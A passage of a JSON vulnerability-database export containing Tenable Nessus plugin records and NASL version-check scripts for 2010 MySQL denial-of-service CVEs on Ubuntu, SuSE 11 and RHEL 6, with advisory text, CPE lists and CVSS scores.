handled certain queries using\na mixed list of numeric and LONGBLOB arguments to the GREATEST() or\nLEAST() functions. An authenticated user could exploit this to make\nMySQL crash, causing a denial of service. (CVE-2010-3838)\n\nIt was discovered that MySQL incorrectly handled queries with nested\njoins when used from stored procedures and prepared statements. An\nauthenticated user could exploit this to make MySQL hang, causing a\ndenial of service. This issue only affected Ubuntu 9.10, 10.04 LTS and\n10.10. (CVE-2010-3839)\n\nIt was discovered that MySQL incorrectly handled improper WKB data\npassed to the PolyFromWKB() function. An authenticated user could\nexploit this to make MySQL crash, causing a denial of service.\n(CVE-2010-3840).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1017-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient15-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient15off\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqlclient16-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqld-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmysqld-pic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client-5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client-5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-client-core-5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-server-core-5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mysql-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libmysqlclient15-dev\", pkgver:\"5.0.22-0ubuntu6.06.15\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libmysqlclient15off\", pkgver:\"5.0.22-0ubuntu6.06.15\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mysql-client\", pkgver:\"5.0.22-0ubuntu6.06.15\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mysql-client-5.0\", pkgver:\"5.0.22-0ubuntu6.06.15\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mysql-common\", pkgver:\"5.0.22-0ubuntu6.06.15\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mysql-server\", pkgver:\"5.0.22-0ubuntu6.06.15\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mysql-server-5.0\", pkgver:\"5.0.22-0ubuntu6.06.15\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libmysqlclient15-dev\", pkgver:\"5.0.51a-3ubuntu5.8\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libmysqlclient15off\", pkgver:\"5.0.51a-3ubuntu5.8\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"mysql-client\", pkgver:\"5.0.51a-3ubuntu5.8\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"mysql-client-5.0\", pkgver:\"5.0.51a-3ubuntu5.8\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"mysql-common\", pkgver:\"5.0.51a-3ubuntu5.8\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"mysql-server\", pkgver:\"5.0.51a-3ubuntu5.8\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"mysql-server-5.0\", pkgver:\"5.0.51a-3ubuntu5.8\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libmysqlclient-dev\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libmysqlclient16\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libmysqlclient16-dev\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libmysqld-dev\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libmysqld-pic\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"mysql-client\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"mysql-client-5.1\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"mysql-common\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"mysql-server\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"mysql-server-5.1\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"mysql-server-core-5.1\", pkgver:\"5.1.37-1ubuntu5.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmysqlclient-dev\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmysqlclient16\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmysqlclient16-dev\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmysqld-dev\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmysqld-pic\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-client\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-client-5.1\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-client-core-5.1\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-common\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-server\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-server-5.1\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-server-core-5.1\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"mysql-testsuite\", pkgver:\"5.1.41-3ubuntu12.7\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmysqlclient-dev\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmysqlclient16\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmysqlclient16-dev\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmysqld-dev\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmysqld-pic\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-client\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-client-5.1\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-client-core-5.1\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-common\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-server\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-server-5.1\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-server-core-5.1\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"mysql-testsuite\", pkgver:\"5.1.49-1ubuntu8.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-dev / libmysqlclient15-dev / libmysqlclient15off / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:12:52", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=694232", "https://bugzilla.novell.com/show_bug.cgi?id=644864", "http://support.novell.com/security/cve/CVE-2010-3834.html", "http://support.novell.com/security/cve/CVE-2010-3838.html", "http://support.novell.com/security/cve/CVE-2010-3833.html", "http://support.novell.com/security/cve/CVE-2010-3840.html", "http://support.novell.com/security/cve/CVE-2010-3839.html", "http://support.novell.com/security/cve/CVE-2010-3837.html", "http://support.novell.com/security/cve/CVE-2010-3836.html", "http://support.novell.com/security/cve/CVE-2010-3835.html"], "pluginID": "57114", "description": "This MySQL version update to 5.0.94 update fixes the following\nsecurity issues :\n\n - CVE-2010-3833: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Resource Management Errors\n (CWE-399)\n\n - CVE-2010-3834: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Insufficient Information\n (CWE-noinfo)\n\n - CVE-2010-3835: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Numeric Errors (CWE-189)\n\n - CVE-2010-3836: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Resource Management Errors\n (CWE-399)\n\n - CVE-2010-3837: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Resource Management Errors\n (CWE-399)\n\n - CVE-2010-3838: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Other (CWE-Other)\n\n - CVE-2010-3839: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Design Error\n (CWE-DesignError)\n\n - CVE-2010-3840: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Other (CWE-Other)", "edition": 6, "reporter": "Tenable", "published": "2011-12-13T00:00:00", "title": "SuSE 11.1 Security Update : MySQL (SAT Patch Number 5285)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3836", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mysql-client", "p-cpe:/a:novell:suse_linux:11:mysql-Max", "p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15", "p-cpe:/a:novell:suse_linux:11:libmysqlclient15-32bit", "p-cpe:/a:novell:suse_linux:11:mysql", "p-cpe:/a:novell:suse_linux:11:libmysqlclient15"], "id": "SUSE_11_LIBMYSQLCLIENT-DEVEL-111013.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57114", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57114);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n\n script_name(english:\"SuSE 11.1 Security Update : MySQL (SAT Patch Number 5285)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This MySQL version update to 5.0.94 update fixes the following\nsecurity issues :\n\n - CVE-2010-3833: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Resource Management Errors\n (CWE-399)\n\n - CVE-2010-3834: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Insufficient Information\n (CWE-noinfo)\n\n - CVE-2010-3835: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Numeric Errors (CWE-189)\n\n - CVE-2010-3836: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Resource Management Errors\n (CWE-399)\n\n - CVE-2010-3837: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Resource Management Errors\n (CWE-399)\n\n - CVE-2010-3838: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Other (CWE-Other)\n\n - CVE-2010-3839: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Design Error\n (CWE-DesignError)\n\n - CVE-2010-3840: CVSS v2 Base Score: 4.0 (moderate)\n (AV:N/AC:L/Au:S/C:N/I:N/A:P): Other (CWE-Other)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=644864\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=694232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3833.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3834.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3835.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3836.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3837.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3838.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3839.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3840.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5285.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libmysqlclient15-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libmysqlclient_r15-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mysql-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mysql-client-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libmysqlclient15-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libmysqlclient15-32bit-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libmysqlclient_r15-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mysql-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mysql-Max-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mysql-client-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libmysqlclient15-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libmysqlclient_r15-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mysql-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mysql-Max-5.0.94-0.2.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mysql-client-5.0.94-0.2.2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:11:36", "references": ["https://access.redhat.com/security/cve/cve-2010-3682", "https://access.redhat.com/security/cve/cve-2010-3833", "https://access.redhat.com/security/cve/cve-2010-3838", "https://access.redhat.com/security/cve/cve-2010-3677", "https://access.redhat.com/security/cve/cve-2010-3681", "https://access.redhat.com/security/cve/cve-2010-3840", "https://access.redhat.com/security/cve/cve-2010-3836", "https://access.redhat.com/security/cve/cve-2010-3839", "https://access.redhat.com/security/cve/cve-2010-3835", "https://access.redhat.com/security/cve/cve-2010-3679", "https://access.redhat.com/errata/RHSA-2011:0164", "https://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html", "https://access.redhat.com/security/cve/cve-2010-3678", "https://access.redhat.com/security/cve/cve-2010-3683", "https://access.redhat.com/security/cve/cve-2010-3837", "https://access.redhat.com/security/cve/cve-2010-3680"], "pluginID": "51571", "description": "Updated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.", "edition": 9, "reporter": "Tenable", "published": "2011-01-19T00:00:00", "title": "RHEL 6 : mysql (RHSA-2011:0164)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", 